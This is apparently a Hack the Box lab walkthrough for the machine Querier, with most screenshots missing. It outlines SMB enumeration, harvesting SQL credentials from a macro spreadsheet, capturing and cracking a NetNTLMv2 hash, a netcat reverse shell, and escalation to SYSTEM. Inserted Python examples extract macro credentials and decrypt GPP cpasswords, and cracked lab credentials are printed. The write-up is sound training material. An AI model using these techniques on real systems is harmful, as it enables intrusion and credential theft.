Tuesday, July 16, 2019

Querier


QUERIER

- Layout for this exercise:





1 - INTRODUCTION

The goal of this exercise is to develop a hacking process for the vulnerable machine Querier, which is a machine from the Hack the Box pentesting platform:

https://www.hackthebox.eu


2 - ENUMERATION

- The IP for Querier is 10.10.10.82:




- Scanning with Nmap:




- Scanning port 1433 in more depth reveals additional information about the Microsoft SQL Server instance:





- Scanning port 445 in more depth shows an SMB service running there:






3 - EXPLOITATION


3.1 - Exploiting SMB

- Connecting to SMB with a null session (no username or password) using smbclient reveals the shared folder Reports:





- Listing the content of the shared folder Reports shows a single document, Report.xlsm; the .xlsm extension denotes a macro-enabled spreadsheet created with Microsoft Excel:


https://xlsxwriter.readthedocs.io/working_with_macros.html





3.2 - Exploiting the .xlsm document


- Downloading to Kali the .xlsm file:











- Obviously the easiest way to read this .xlsm document would be to open it in Microsoft Excel, but let's assume Microsoft Excel is not available.

- An .xlsm file is an Office Open XML package, that is, a zip archive, so it can simply be unzipped:




- The file vbaProject.bin inside the xl folder is the binary container that holds the VBA macros (and any functions they define):








- Running the strings command over vbaProject.bin reveals credentials for the SQL Server embedded in the macro:




- Storing the credentials:
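The same inspection done in Python, as an added example (not code from the original post): open the .xlsm as the zip archive it is, pull out xl/vbaProject.bin and keep the printable strings that look like a connection string, which is what strings plus grep did above. The workbook is constructed in memory; the user name reporting comes from the box, while the server, database, password and macro name are invented placeholders.

```python
import io
import re
import zipfile


def build_sample_xlsm() -> bytes:
    """Constructed stand-in for Report.xlsm. A real .xlsm is an OOXML zip whose
    xl/vbaProject.bin is an OLE2 container with compressed VBA modules; here the
    macro body is fake plain text so the example runs offline."""
    fake_vba = (
        b"\xd0\xcf\x11\xe0" + b"\x00" * 28            # OLE2 magic + padding (constructed)
        + b'Attribute VB_Name = "Connect"\x00\x00'
        + b"Driver={SQL Server};Server=QUERIER;Database=reports;"
          b"Uid=reporting;Pwd=Example_Pa55w0rd\x00"   # placeholder password, not the box's
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/vbaProject.bin", fake_vba)
    return buf.getvalue()


def extract_strings(data: bytes, min_len: int = 8) -> list:
    """Same idea as `strings -n 8`: runs of printable ASCII of at least min_len bytes."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


# Keys that betray an ADO/ODBC connection string inside a macro.
CRED_KEYS = re.compile(r"(?i)\b(pwd|password|uid|user id|server)\s*=")


def find_vba_credentials(xlsm: bytes) -> list:
    """Unzip the workbook in memory, read xl/vbaProject.bin and keep the strings
    that look like connection-string fragments."""
    with zipfile.ZipFile(io.BytesIO(xlsm)) as z:
        if "xl/vbaProject.bin" not in z.namelist():
            return []                     # plain .xlsx: no macro project at all
        vba = z.read("xl/vbaProject.bin")
    return [s for s in extract_strings(vba) if CRED_KEYS.search(s)]


def parse_connection_string(s: str) -> dict:
    """Split 'Key=Value;Key=Value' into a dict with lower-cased keys."""
    pairs = (part.split("=", 1) for part in s.split(";") if "=" in part)
    return {k.strip().lower(): v.strip() for k, v in pairs}


if __name__ == "__main__":
    for hit in find_vba_credentials(build_sample_xlsm()):
        creds = parse_connection_string(hit)
        print(f"{creds.get('uid')}:{creds.get('pwd')} on {creds.get('server')}")
```

strings works on this box because the connection string is stored as a literal; for an obfuscated macro use olevba from oletools, which decompresses the VBA source properly instead of relying on readable fragments.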




3.3 - Exploiting the SQL server


- The Impacket script mssqlclient.py is used to connect to the SQL Server:






- Connecting with the option -windows-auth (Windows authentication instead of SQL Server logins, which mssqlclient.py uses by default) and the credentials found in point 3.2:







- The built-in command enable_xp_cmdshell (which turns on the xp_cmdshell stored procedure so that arbitrary operating system commands can be run) fails because the user reporting does not have enough permissions:





- In fact, at this point we are not a member of the sysadmin server role:







- However we can obtain more information by executing xp_dirtree (which lists the subdirectories, and optionally the files, of a given path) against a UNC path pointing at Kali, and running responder to catch the NetNTLMv2 hash that the SQL Server service account leaks when it authenticates to that share.

- responder is best known for answering specific NBT-NS (NetBIOS Name Service) and LLMNR queries based on their name suffix, but here it is its built-in SMB server that receives the connection and records the authentication attempt:

https://gitlab.com/kalilinux/packages/responder





- Running xp_dirtree:





- responder captures the NetNTLMv2 hash of the SQL Server service account:




- Storing the hashes:




3.4 - Cracking the NetNTLMv2 hashes with John The Ripper

- Running John The Ripper against the captured hash recovers the credentials mssql-svc:corporate568:





3.5 - Getting a remote shell


- Let's reconnect to the SQL Server with the new credentials mssql-svc:corporate568:





- Now enable_xp_cmdshell succeeds (xp_cmdshell is disabled by default and turning it on requires the ALTER SETTINGS permission, which sysadmin members hold) because the user mssql-svc has enough permissions:







- Downloading nc.exe to Kali:




- Transferring nc.exe from Kali to Querier:






- Starting a Netcat listening session on port 5555:




- Launching a Netcat connection from Querier to Kali:




- The connection is successful and we get a remote shell:








4 - CAPTURING THE 1st FLAG

- Reading user.txt:





5 - PRIVILEGE ESCALATION

- Access to Administrator's folder is denied:



- However the Group Policy Preferences file Groups.xml is readable:




- Storing the cpassword attribute:




- Decrypting cpassword with the well-known gpp-decrypt (the AES key that protects cpassword was published by Microsoft, so any cpassword found in SYSVOL or a local policy cache is effectively plaintext):

https://github.com/BustedSec/gpp-decrypt




- So the credentials for the Administrator are:
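Why gpp-decrypt needs no secret, as an added example (not code from the original post nor from gpp-decrypt): cpassword is AES-256-CBC with the key Microsoft published in the MS-GPPREF documentation and an all-zero IV, so the steps are restore the base64 padding, decrypt, strip PKCS#7 padding and decode UTF-16LE. AES is implemented here in pure Python so the block runs on the standard library alone. The input used is a widely published cpassword from a different Hack the Box machine (Active), chosen because the Querier value appears only in a screenshot; any cpassword string can be passed to gpp_decrypt the same way.

```python
import base64

# Key published by Microsoft for GPP cpassword values; the IV is 16 zero bytes.
GPP_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")


def _build_sbox() -> list:
    """AES S-box: GF(2^8) inverse followed by the affine map (FIPS-197 5.1.1)."""
    rotl8 = lambda v, s: ((v << s) | (v >> (8 - s))) & 0xFF
    sbox, p, q = [0] * 256, 1, 1
    while True:
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF   # p = p * 3
        q ^= q << 1; q ^= q << 2; q ^= q << 4; q &= 0xFF       # q = q / 3
        if q & 0x80:
            q ^= 0x09
        sbox[p] = q ^ rotl8(q, 1) ^ rotl8(q, 2) ^ rotl8(q, 3) ^ rotl8(q, 4) ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63
    return sbox


SBOX = _build_sbox()
INV_SBOX = {v: i for i, v in enumerate(SBOX)}


def _xtime(a: int) -> int:
    return ((a << 1) ^ 0x1B) & 0xFF if a & 0x80 else a << 1


def _gmul(a: int, b: int) -> int:
    """Multiplication in GF(2^8) modulo x^8 + x^4 + x^3 + x + 1."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a, b = _xtime(a), b >> 1
    return r


def _expand_key(key: bytes) -> list:
    """AES-256 key schedule: 60 words returned as fifteen 16-byte round keys."""
    w = [list(key[i:i + 4]) for i in range(0, 32, 4)]
    rcon = 1
    for i in range(8, 60):
        t = list(w[i - 1])
        if i % 8 == 0:                      # RotWord, SubWord, Rcon
            t = [SBOX[b] for b in t[1:] + t[:1]]
            t[0] ^= rcon
            rcon = _xtime(rcon)
        elif i % 8 == 4:                    # SubWord only (Nk = 8)
            t = [SBOX[b] for b in t]
        w.append([a ^ b for a, b in zip(w[i - 8], t)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(15)]


def _inv_shift_rows(s: list) -> list:
    # state index = row + 4*col; row r is rotated right by r positions
    return [s[((c - r) % 4) * 4 + r] for c in range(4) for r in range(4)]


def _inv_mix_columns(s: list) -> list:
    out = []
    for c in range(4):
        a0, a1, a2, a3 = s[4 * c:4 * c + 4]
        out += [_gmul(a0, 14) ^ _gmul(a1, 11) ^ _gmul(a2, 13) ^ _gmul(a3, 9),
                _gmul(a0, 9) ^ _gmul(a1, 14) ^ _gmul(a2, 11) ^ _gmul(a3, 13),
                _gmul(a0, 13) ^ _gmul(a1, 9) ^ _gmul(a2, 14) ^ _gmul(a3, 11),
                _gmul(a0, 11) ^ _gmul(a1, 13) ^ _gmul(a2, 9) ^ _gmul(a3, 14)]
    return out


def aes256_decrypt_block(block: bytes, round_keys: list) -> bytes:
    """FIPS-197 InvCipher for one 16-byte block (14 rounds)."""
    s = [b ^ k for b, k in zip(block, round_keys[14])]
    for rnd in range(13, 0, -1):
        s = [INV_SBOX[b] for b in _inv_shift_rows(s)]
        s = _inv_mix_columns([b ^ k for b, k in zip(s, round_keys[rnd])])
    s = [INV_SBOX[b] for b in _inv_shift_rows(s)]
    return bytes(b ^ k for b, k in zip(s, round_keys[0]))


def aes256_cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    rk, out, prev = _expand_key(key), b"", iv
    for i in range(0, len(data), 16):
        blk = data[i:i + 16]
        out += bytes(p ^ c for p, c in zip(aes256_decrypt_block(blk, rk), prev))
        prev = blk
    return out


def gpp_decrypt(cpassword: str) -> str:
    """Same steps as gpp-decrypt: restore the base64 '=' padding that GPP strips,
    AES-256-CBC with the public key and a zero IV, drop PKCS#7 padding, decode UTF-16LE."""
    raw = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    plain = aes256_cbc_decrypt(GPP_KEY, b"\x00" * 16, raw)
    return plain[:-plain[-1]].decode("utf-16le")


# Widely published cpassword from the Hack the Box machine Active; Querier's own
# value is only shown in the screenshot above, so it is not reproduced here.
SAMPLE_CPASSWORD = ("edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xU"
                    "jTLfCuNH8pG5aSVYdYw/NglVmQ")

if __name__ == "__main__":
    print(gpp_decrypt(SAMPLE_CPASSWORD))
```

Because the key is public, the fix is not a better key but removing the credential: Microsoft's MS14-025 patch stops the GPP editor from writing new cpassword entries, and any Groups.xml still carrying one should be treated as a leaked password and rotated.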




- Impacket's psexec.py, run with the Administrator credentials, spawns a SYSTEM shell:





6 - CAPTURING THE 2nd FLAG

- Reading root.txt: